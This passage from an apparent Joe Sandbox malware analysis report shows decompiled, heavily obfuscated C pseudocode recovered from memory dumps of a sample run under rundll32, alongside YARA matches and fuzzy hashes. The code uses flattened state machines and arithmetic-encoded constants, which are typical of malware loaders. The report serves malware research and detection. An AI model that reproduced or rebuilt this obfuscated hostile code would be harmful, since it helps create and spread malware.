                                                                      										_t244 =  &(_t244[0xd]);
                                                                      										_t217 = 0xe5d9d0e;
                                                                      										continue;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L13:
                                                                      						return _t238;
                                                                      					}
                                                                      					_t217 = 0xe97c3dd;
                                                                      					L10:
                                                                      					__eflags = _t217 - 0x1b50eba4;
                                                                      				} while (__eflags != 0);
                                                                      				goto L13;
                                                                      			}








































                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2C;y$5u$E:$b^
                                                                      • API String ID: 0-4114578400
                                                                      • Opcode ID: 52fae7da8ce1960d177ab42cb5ef1fe43ae5418987dd87cdf8f7e708ddbece43
                                                                      • Instruction ID: 0e5e095c6f1a0ff060e3b7a0f01f37f773481a0897619777a6fba73286be7017
                                                                      • Opcode Fuzzy Hash: 52fae7da8ce1960d177ab42cb5ef1fe43ae5418987dd87cdf8f7e708ddbece43
                                                                      • Instruction Fuzzy Hash: C4A11F715093819FE359CF62C58945BBBF1BFC5708F40891CF29A862A0D7BA8A09CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2C;y$5u$E:$b^
                                                                      • API String ID: 0-4114578400
                                                                      • Opcode ID: db5f780c1be03f6b24e7044e1de048fbd714646e60e300b2392a89149157520b
                                                                      • Instruction ID: 7d8dfcb8cebb2694e09ee481e1083e532fd13733ccaa54f8b8449ee1f16e1ca0
                                                                      • Opcode Fuzzy Hash: db5f780c1be03f6b24e7044e1de048fbd714646e60e300b2392a89149157520b
                                                                      • Instruction Fuzzy Hash: 7BA131B15093819FD358CF22C58A45BFBE1FBC5708F50891DF29A96260C7B98A18CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E02001090(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                      				signed int _v4;
                                                                      				intOrPtr _v8;
                                                                      				char _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				unsigned int _v64;
                                                                      				signed int _v68;
                                                                      				void* _t140;
                                                                      				void* _t158;
                                                                      				intOrPtr* _t165;
                                                                      				void* _t167;
                                                                      				void* _t183;
                                                                      				void* _t184;
                                                                      				signed int _t185;
                                                                      				signed int _t186;
                                                                      				signed int _t187;
                                                                      				signed int _t188;
                                                                      				signed int _t189;
                                                                      				signed int* _t192;
                                                                      
                                                                      				_t165 = _a4;
                                                                      				_push(_a8);
                                                                      				_t183 = __ecx;
                                                                      				_push(_t165);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t140);
                                                                      				_v8 = 0x6f9ade;
                                                                      				_t184 = 0;
                                                                      				_v4 = _v4 & 0;
                                                                      				_t192 =  &(( &_v68)[4]);
                                                                      				_v44 = 0x982a;
                                                                      				_v44 = _v44 + 0xbc31;
                                                                      				_t167 = 0x2bf8d881;
                                                                      				_v44 = _v44 | 0xf90c86f7;
                                                                      				_v44 = _v44 ^ 0xf90dd6fe;
                                                                      				_v28 = 0x630d;
                                                                      				_t185 = 0x43;
                                                                      				_v28 = _v28 * 0x4e;
                                                                      				_v28 = _v28 ^ 0x001e2df7;
                                                                      				_v56 = 0x19d0;
                                                                      				_v56 = _v56 * 0x38;
                                                                      				_v56 = _v56 + 0x1bd7;
                                                                      				_v56 = _v56 ^ 0x4b810ed7;
                                                                      				_v56 = _v56 ^ 0x4b84d952;
                                                                      				_v32 = 0xc9e1;
                                                                      				_v32 = _v32 + 0xabf9;
                                                                      				_v32 = _v32 ^ 0x000119f3;
                                                                      				_v36 = 0x329d;
                                                                      				_v36 = _v36 >> 1;
                                                                      				_v36 = _v36 ^ 0x00004114;
                                                                      				_v60 = 0xf614;
                                                                      				_v60 = _v60 / _t185;
                                                                      				_t186 = 0x78;
                                                                      				_v60 = _v60 * 0x44;
                                                                      				_v60 = _v60 + 0xe907;
                                                                      				_v60 = _v60 ^ 0x0001d7a4;
                                                                      				_v48 = 0xee3;
                                                                      				_v48 = _v48 * 0x48;
                                                                      				_v48 = _v48 ^ 0xc9a4a55a;
                                                                      				_v48 = _v48 ^ 0xc9a0a1d8;
                                                                      				_v64 = 0x7fce;
                                                                      				_v64 = _v64 / _t186;
                                                                      				_t187 = 0x11;
                                                                      				_v64 = _v64 / _t187;
                                                                      				_v64 = _v64 >> 6;
                                                                      				_v64 = _v64 ^ 0x000063f0;
                                                                      				_v68 = 0xa533;
                                                                      				_t188 = 0x65;
                                                                      				_v68 = _v68 / _t188;
                                                                      				_v68 = _v68 >> 0xf;
                                                                      				_v68 = _v68 * 0x3c;
                                                                      				_v68 = _v68 ^ 0x000027f2;
                                                                      				_v16 = 0x6517;
                                                                      				_v16 = _v16 * 0x61;
                                                                      				_v16 = _v16 ^ 0x00262f84;
                                                                      				_v20 = 0xf07;
                                                                      				_v20 = _v20 + 0xffffaba9;
                                                                      				_v20 = _v20 ^ 0xffffe5ca;
                                                                      				_v24 = 0x4d0a;
                                                                      				_v24 = _v24 << 0xe;
                                                                      				_v24 = _v24 ^ 0x1342cb05;
                                                                      				_v40 = 0xdf77;
                                                                      				_v40 = _v40 >> 2;
                                                                      				_v40 = _v40 + 0xffffea10;
                                                                      				_v40 = _v40 ^ 0x0000626b;
                                                                      				_v52 = 0xc020;
                                                                      				_v52 = _v52 | 0x928f446b;
                                                                      				_t189 = 0x74;
                                                                      				_v52 = _v52 / _t189;
                                                                      				_v52 = _v52 | 0x14dbb019;
                                                                      				_v52 = _v52 ^ 0x15dbc5e6;
                                                                      				do {
                                                                      					while(_t167 != 0x94f4759) {
                                                                      						if(_t167 == 0xc9fc140) {
                                                                      							_push(_t167);
                                                                      							_t184 = E01FF54FB(_v12);
                                                                      							if(_t184 != 0) {
                                                                      								_t167 = 0x38319c56;
                                                                      								continue;
                                                                      							}
                                                                      						} else {
                                                                      							if(_t167 == 0x2bf8d881) {
                                                                      								_t167 = 0x94f4759;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t167 != 0x38319c56) {
                                                                      									goto L13;
                                                                      								} else {
                                                                      									E01FF9C40( &_v12, _v16, _t183, _v20, _v24, _t167, _v28, _v40, _t184, _t167, _v52);
                                                                      									 *_t165 = _v12;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L6:
                                                                      						return _t184;
                                                                      					}
                                                                      					_t158 = E01FF9C40( &_v12, _v56, _t183, _v32, _v36, _t167, _v44, _v60, 0, _t167, _v48);
                                                                      					_t192 =  &(_t192[0xa]);
                                                                      					if(_t158 == 0) {
                                                                      						_t167 = 0x2cce3dbc;
                                                                      						goto L13;
                                                                      					} else {
                                                                      						_t167 = 0xc9fc140;
                                                                      						continue;
                                                                      					}
                                                                      					goto L6;
                                                                      					L13:
                                                                      				} while (_t167 != 0x2cce3dbc);
                                                                      				goto L6;
                                                                      			}


                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M$c$YGO$kb
                                                                      • API String ID: 0-1506048532
                                                                      • Opcode ID: 5d4ebc2505cff4899b4b22ae4471b08fad847f46fa3111b0232cb516bf6688a7
                                                                      • Instruction ID: 0e03f7ab5d63d89d42bf9b64e5d633d6ad3d288000d660696d1ea9a4612c0538
                                                                      • Opcode Fuzzy Hash: 5d4ebc2505cff4899b4b22ae4471b08fad847f46fa3111b0232cb516bf6688a7
                                                                      • Instruction Fuzzy Hash: 0E7133711083419FE358CF69C88991FFBE1BBC9758F404A1DF189962A0D3BAC659CF46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E01FFBE74(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                      				char _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				signed int _v116;
                                                                      				void* _t140;
                                                                      				void* _t156;
                                                                      				void* _t157;
                                                                      				signed int _t163;
                                                                      				signed int _t164;
                                                                      				signed int _t165;
                                                                      				signed int _t166;
                                                                      				signed int _t167;
                                                                      				signed int _t168;
                                                                      				void* _t171;
                                                                      				void* _t195;
                                                                      				void* _t196;
                                                                      				signed int* _t199;
                                                                      
                                                                      				_push(_a8);
                                                                      				_t195 = __edx;
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t140);
                                                                      				_v108 = 0xfc4f;
                                                                      				_t199 =  &(( &_v116)[4]);
                                                                      				_v108 = _v108 | 0x4da9a639;
                                                                      				_v108 = _v108 + 0x67dc;
                                                                      				_t196 = 0;
                                                                      				_v108 = _v108 << 0xc;
                                                                      				_t171 = 0x2e363e63;
                                                                      				_v108 = _v108 ^ 0xa6659d9d;
                                                                      				_v72 = 0xf402;
                                                                      				_v72 = _v72 ^ 0x5f9ae956;
                                                                      				_v72 = _v72 ^ 0x5f9a291f;
                                                                      				_v112 = 0xe152;
                                                                      				_v112 = _v112 | 0xaffcdffa;
                                                                      				_t163 = 0x1d;
                                                                      				_v112 = _v112 / _t163;
                                                                      				_v112 = _v112 ^ 0x0611b87a;
                                                                      				_v116 = 0x6c25;
                                                                      				_v116 = _v116 ^ 0x0c91b378;
                                                                      				_v116 = _v116 + 0x2f8;
                                                                      				_v116 = _v116 | 0x69d7e26c;
                                                                      				_v116 = _v116 ^ 0x6dd79b31;
                                                                      				_v104 = 0x7ef1;
                                                                      				_v104 = _v104 + 0xffff4bb2;
                                                                      				_t164 = 0x4f;
                                                                      				_v104 = _v104 / _t164;
                                                                      				_t165 = 0x4d;
                                                                      				_v104 = _v104 / _t165;
                                                                      				_v104 = _v104 ^ 0x000acb92;
                                                                      				_v88 = 0xf338;
                                                                      				_t166 = 0x31;
                                                                      				_v88 = _v88 / _t166;
                                                                      				_v88 = _v88 >> 7;
                                                                      				_v88 = _v88 ^ 0x00001bb8;
                                                                      				_v100 = 0x39ac;
                                                                      				_v100 = _v100 >> 5;
                                                                      				_t167 = 0x6a;
                                                                      				_v100 = _v100 * 0x73;
                                                                      				_v100 = _v100 + 0xffffcfed;
                                                                      				_v100 = _v100 ^ 0x0000c292;
                                                                      				_v84 = 0xa231;
                                                                      				_v84 = _v84 + 0x99eb;
                                                                      				_v84 = _v84 / _t167;
                                                                      				_v84 = _v84 ^ 0x000046d3;
                                                                      				_v76 = 0xf128;
                                                                      				_v76 = _v76 + 0xffff9193;
                                                                      				_v76 = _v76 >> 9;
                                                                      				_v76 = _v76 ^ 0x00001e23;
                                                                      				_v92 = 0x62a3;
                                                                      				_t168 = 0x33;
                                                                      				_v92 = _v92 / _t168;
                                                                      				_v92 = _v92 ^ 0x5bc1cdff;
                                                                      				_v92 = _v92 + 0xffff8115;
                                                                      				_v92 = _v92 ^ 0x5bc105bf;
                                                                      				_v80 = 0x9d4f;
                                                                      				_v80 = _v80 << 0xf;
                                                                      				_v80 = _v80 + 0xffff2359;
                                                                      				_v80 = _v80 ^ 0x4ea6cb3e;
                                                                      				_v96 = 0x4976;
                                                                      				_v96 = _v96 + 0x63d7;
                                                                      				_v96 = _v96 + 0xf4f6;
                                                                      				_v96 = _v96 + 0xffffaa83;
                                                                      				_v96 = _v96 ^ 0x00013bfc;
                                                                      				do {
                                                                      					while(_t171 != 0xc31af3f) {
                                                                      						if(_t171 == 0x1ee6df64) {
                                                                      							_t157 = E01FFBAA2( &_v68, _v104, _v88, _t195);
                                                                      							_t199 =  &(_t199[2]);
                                                                      							__eflags = _t157;
                                                                      							if(__eflags != 0) {
                                                                      								_t171 = 0xc31af3f;
                                                                      								continue;
                                                                      							}
                                                                      						} else {
                                                                      							if(_t171 == 0x1ee95fdc) {
                                                                      								E01FFFEE3(_a8,  &_v68, _v108, _v72, _v112, _v116);
                                                                      								_t199 =  &(_t199[4]);
                                                                      								_t171 = 0x1ee6df64;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t171 == 0x2c795783) {
                                                                      									_t136 = _t195 + 8; // 0x301e42
                                                                      									__eflags = E01FFF914(_v76, _v92, __eflags, _v80, _t136, _v96,  &_v68);
                                                                      									_t196 =  !=  ? 1 : _t196;
                                                                      								} else {
                                                                      									if(_t171 != 0x2e363e63) {
                                                                      										goto L13;
                                                                      									} else {
                                                                      										_t171 = 0x1ee95fdc;
                                                                      										continue;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L16:
                                                                      						return _t196;
                                                                      					}
                                                                      					_t130 = _t195 + 4; // 0x301e3e
                                                                      					_t156 = E01FFBAA2( &_v68, _v100, _v84, _t130);
                                                                      					_t199 =  &(_t199[2]);
                                                                      					__eflags = _t156;
                                                                      					if(__eflags == 0) {
                                                                      						_t171 = 0x26c6c5b0;
                                                                      						goto L13;
                                                                      					} else {
                                                                      						_t171 = 0x2c795783;
                                                                      						continue;
                                                                      					}
                                                                      					goto L16;
                                                                      					L13:
                                                                      					__eflags = _t171 - 0x26c6c5b0;
                                                                      				} while (__eflags != 0);
                                                                      				goto L16;
                                                                      			}






























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %l$c>6.$c>6.$vI
                                                                      • API String ID: 0-1842334051
                                                                      • Opcode ID: e35383a8ff9d3873cfa8fad072e536b5cf3e084f98ebf9b090aa7fc1caa2cc9a
                                                                      • Instruction ID: 3fdc9dbab67d17d74a7f98879248cfca7cd5424279692a122abe4376599a9c9f
                                                                      • Opcode Fuzzy Hash: e35383a8ff9d3873cfa8fad072e536b5cf3e084f98ebf9b090aa7fc1caa2cc9a
                                                                      • Instruction Fuzzy Hash: 64717A72508341DBE354CF25C88581BBBE1FFD8758F404A2DF6CA96160D3B6CA1ACB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M$c$YGO$kb
                                                                      • API String ID: 0-1506048532
                                                                      • Opcode ID: f3918612a07dbf820744b97fdc2a3ffe60349661cd5382ba9ec48ca095532492
                                                                      • Instruction ID: 77cf14b288af43b7c78a855ce484ea297be23309c4ac81b24ee42e02cdd983ae
                                                                      • Opcode Fuzzy Hash: f3918612a07dbf820744b97fdc2a3ffe60349661cd5382ba9ec48ca095532492
                                                                      • Instruction Fuzzy Hash: 167154B11083819FD358CF65C88991FBBF1FBC5748F404A1DF28596260D3BACA598F86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %l$c>6.$c>6.$vI
                                                                      • API String ID: 0-1842334051
                                                                      • Opcode ID: 24a708c09509732ed6a1976b4a33833c542d2d2f6f4fa2fdc461646d9a68ae0e
                                                                      • Instruction ID: 36198619501343b6fa6cf13d640ef466a8f0d638fb2eb081c882cdad65654a8e
                                                                      • Opcode Fuzzy Hash: 24a708c09509732ed6a1976b4a33833c542d2d2f6f4fa2fdc461646d9a68ae0e
                                                                      • Instruction Fuzzy Hash: 047199B25083419BD794CF21C88691FBBE1FBD8758F500A1DF589962A0D375CA29CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *Bl$>4$Z`$x[
                                                                      • API String ID: 0-788090992
                                                                      • Opcode ID: 36f0ac18098e83fdd7a7180336d11f300c49605d38501b2fd70b3092a2ba1ae5
                                                                      • Instruction ID: d7bd946ab7ac8258fdf0702e38ca63276ffa16c984d6eabc9d1d127f37a784ed
                                                                      • Opcode Fuzzy Hash: 36f0ac18098e83fdd7a7180336d11f300c49605d38501b2fd70b3092a2ba1ae5
                                                                      • Instruction Fuzzy Hash: DB511FB1C0130EABDF58CFE1D98A4EEBBB1FB08314F208158E515762A0D3B94A59CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E01FF9D2F(intOrPtr __ecx, intOrPtr* __edx) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr* _v8;
                                                                      				intOrPtr _v12;
                                                                      				char _v16;
                                                                      				signed int _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				intOrPtr* _t178;
                                                                      				intOrPtr _t188;
                                                                      				intOrPtr _t189;
                                                                      				signed int _t191;
                                                                      				intOrPtr _t195;
                                                                      				intOrPtr _t196;
                                                                      				signed int _t215;
                                                                      				signed int _t216;
                                                                      				signed int _t217;
                                                                      				signed int _t218;
                                                                      				intOrPtr _t219;
                                                                      				void* _t221;
                                                                      				signed int _t222;
                                                                      				intOrPtr _t223;
                                                                      				intOrPtr _t224;
                                                                      				signed int* _t225;
                                                                      
                                                                      				_t189 = __ecx;
                                                                      				_t225 =  &_v84;
                                                                      				_v8 = __edx;
                                                                      				_v24 = __ecx;
                                                                      				_v84 = 0x52c3;
                                                                      				_v84 = _v84 + 0xffffa290;
                                                                      				_t221 = 0x1b1ec7af;
                                                                      				_v20 = _v20 & 0x00000000;
                                                                      				_t215 = 0x28;
                                                                      				_v84 = _v84 / _t215;
                                                                      				_v84 = _v84 ^ 0xc70a2cbb;
                                                                      				_v84 = _v84 ^ 0xc16c29fd;
                                                                      				_v60 = 0xef49;
                                                                      				_t216 = 0x4f;
                                                                      				_v60 = _v60 / _t216;
                                                                      				_v60 = _v60 + 0x8f43;
                                                                      				_v60 = _v60 ^ 0x0000e631;
                                                                      				_v52 = 0xdf8d;
                                                                      				_v52 = _v52 | 0x89b2267c;
                                                                      				_v52 = _v52 ^ 0x13e61697;
                                                                      				_v52 = _v52 ^ 0x9a54c391;
                                                                      				_v80 = 0xa7ea;
                                                                      				_v80 = _v80 >> 2;
                                                                      				_v80 = _v80 + 0xffff1a0f;
                                                                      				_v80 = _v80 ^ 0xf694800b;
                                                                      				_v80 = _v80 ^ 0x096bf198;
                                                                      				_v56 = 0x4df7;
                                                                      				_t217 = 0x58;
                                                                      				_v56 = _v56 * 0x24;
                                                                      				_v56 = _v56 >> 0x10;
                                                                      				_v56 = _v56 ^ 0x00005064;
                                                                      				_v44 = 0x5793;
                                                                      				_v44 = _v44 << 3;
                                                                      				_v44 = _v44 | 0x1a78ccf0;
                                                                      				_v44 = _v44 ^ 0x1a7ad28a;
                                                                      				_v48 = 0x4fde;
                                                                      				_v48 = _v48 / _t217;
                                                                      				_v48 = _v48 * 0x14;
                                                                      				_v48 = _v48 ^ 0x0000583a;
                                                                      				_v32 = 0x8af0;
                                                                      				_v32 = _v32 + 0xffff32af;
                                                                      				_v32 = _v32 ^ 0xffffb04c;
                                                                      				_v36 = 0x75dd;
                                                                      				_v36 = _v36 + 0x1ee0;
                                                                      				_v36 = _v36 ^ 0x0000d042;
                                                                      				_v72 = 0x8173;
                                                                      				_v72 = _v72 ^ 0xf613a128;
                                                                      				_v72 = _v72 >> 0xb;
                                                                      				_v72 = _v72 | 0xdda636e2;
                                                                      				_v72 = _v72 ^ 0xddbe8dc6;
                                                                      				_v76 = 0xe20a;
                                                                      				_v76 = _v76 * 0x6c;
                                                                      				_v76 = _v76 << 0xc;
                                                                      				_v76 = _v76 >> 0x10;
                                                                      				_v76 = _v76 ^ 0x0000f2d9;
                                                                      				_v64 = 0x5aba;
                                                                      				_v64 = _v64 << 5;
                                                                      				_v64 = _v64 ^ 0x995ec148;
                                                                      				_v64 = _v64 + 0xffffc53f;
                                                                      				_v64 = _v64 ^ 0x9955459c;
                                                                      				_v68 = 0xe247;
                                                                      				_v68 = _v68 ^ 0xa76713ca;
                                                                      				_t218 = 0x3b;
                                                                      				_t224 = _v8;
                                                                      				_t219 = _v4;
                                                                      				_t188 = _v8;
                                                                      				_v68 = _v68 / _t218;
                                                                      				_v68 = _v68 >> 8;
                                                                      				_v68 = _v68 ^ 0x0002c308;
                                                                      				_v40 = 0xd4fd;
                                                                      				_v40 = _v40 * 0x1a;
                                                                      				_v40 = _v40 ^ 0x6afb2fbd;
                                                                      				_v40 = _v40 ^ 0x6aee8e0f;
                                                                      				_t174 = _v28;
                                                                      				L1:
                                                                      				while(1) {
                                                                      					do {
                                                                      						while(_t221 != 0x145613b1) {
                                                                      							if(_t221 == 0x146a35d3) {
                                                                      								_t219 = 0x10000;
                                                                      								_push(_t189);
                                                                      								_t174 = E01FF54FB(0x10000);
                                                                      								_t188 = _t174;
                                                                      								if(_t188 != 0) {
                                                                      									_v28 = _t174;
                                                                      									_t224 = 0x10000;
                                                                      									L7:
                                                                      									_t189 = _v24;
                                                                      									_t221 = 0x145613b1;
                                                                      									continue;
                                                                      								}
                                                                      							} else {
                                                                      								if(_t221 != 0x1b1ec7af) {
                                                                      									goto L15;
                                                                      								} else {
                                                                      									_t221 = 0x146a35d3;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      							goto L16;
                                                                      						}
                                                                      						_t191 = E020034DA(_v52,  &_v16, _v80, _v56, _t224, _t174, _t189);
                                                                      						_t225 =  &(_t225[5]);
                                                                      						_v20 = _t191;
                                                                      						if(_t191 == 0) {
                                                                      							L14:
                                                                      							_t189 = _v24;
                                                                      							_t221 = 0x2a69df6d;
                                                                      							goto L15;
                                                                      						} else {
                                                                      							_t195 = _v16;
                                                                      							if(_t195 == 0) {
                                                                      								goto L14;
                                                                      							} else {
                                                                      								_t174 = _v28 + _t195;
                                                                      								_v28 = _v28 + _t195;
                                                                      								_t224 = _t224 - _t195;
                                                                      								if(_t224 != 0) {
                                                                      									goto L7;
                                                                      								} else {
                                                                      									_t196 = _t219 + _t219;
                                                                      									_push(_t196);
                                                                      									_v12 = _t196;
                                                                      									_t223 = E01FF54FB(_t196);
                                                                      									if(_t223 != 0) {
                                                                      										E01FF6374(_v32, _t223, _t219, _t188, _v36);
                                                                      										E01FFDE81(_v72, _t188, _v76);
                                                                      										_t224 = _t219;
                                                                      										_t174 = _t223 + _t219;
                                                                      										_t219 = _v12;
                                                                      										_t225 =  &(_t225[4]);
                                                                      										_v28 = _t174;
                                                                      										_t188 = _t223;
                                                                      										if(_t224 != 0) {
                                                                      											goto L7;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						break;
                                                                      						L15:
                                                                      						_t174 = _v28;
                                                                      					} while (_t221 != 0x2a69df6d);
                                                                      					L16:
                                                                      					_t222 = _v20;
                                                                      					if(_t222 != 0) {
                                                                      						_t178 = _v8;
                                                                      						 *_t178 = _t188;
                                                                      						 *((intOrPtr*)(_t178 + 4)) = _t219 - _t224;
                                                                      					} else {
                                                                      						E01FFDE81(_v64, _t188, _v68);
                                                                      					}
                                                                      					return _t222;
                                                                      				}
                                                                      			}


                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :X$G$dP
                                                                      • API String ID: 0-1717702412
                                                                      • Opcode ID: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
                                                                      • Instruction ID: fd880a5faeb225042d5082e5bc313f4c5d35fd8cb4c050488a13d5f2a77c8c44
                                                                      • Opcode Fuzzy Hash: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
                                                                      • Instruction Fuzzy Hash: 189131716093418FD358CF29C48541BFBE1BFC4758F408A1DF696A72A1C7B6DA498F82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :X$G$dP
                                                                      • API String ID: 0-1717702412
                                                                      • Opcode ID: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
                                                                      • Instruction ID: 03f4a2db10d5bf134848d397056bb17967e116aab67a18051ecc094d6adbcac7
                                                                      • Opcode Fuzzy Hash: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
                                                                      • Instruction Fuzzy Hash: 089141B16093428FD358CF29C48540BFBE1BBC5758F808A1EF59697261C7B9DA498F82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E0200135B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				char _v4;
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				void* _t142;
                                                                      				void* _t164;
                                                                      				void* _t167;
                                                                      				signed int _t181;
                                                                      				signed int _t182;
                                                                      				signed int _t183;
                                                                      				void* _t185;
                                                                      				signed int* _t188;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t142);
                                                                      				_v68 = 0xf6fd;
                                                                      				_t188 =  &(( &_v68)[5]);
                                                                      				_t185 = 0;
                                                                      				_t167 = 0x120b6438;
                                                                      				_t181 = 0x37;
                                                                      				_v68 = _v68 / _t181;
                                                                      				_t182 = 6;
                                                                      				_v68 = _v68 * 0x52;
                                                                      				_v68 = _v68 + 0xcd83;
                                                                      				_v68 = _v68 ^ 0x00023d8c;
                                                                      				_v12 = 0xd60a;
                                                                      				_v12 = _v12 + 0xd6ec;
                                                                      				_v12 = _v12 ^ 0x0001acf7;
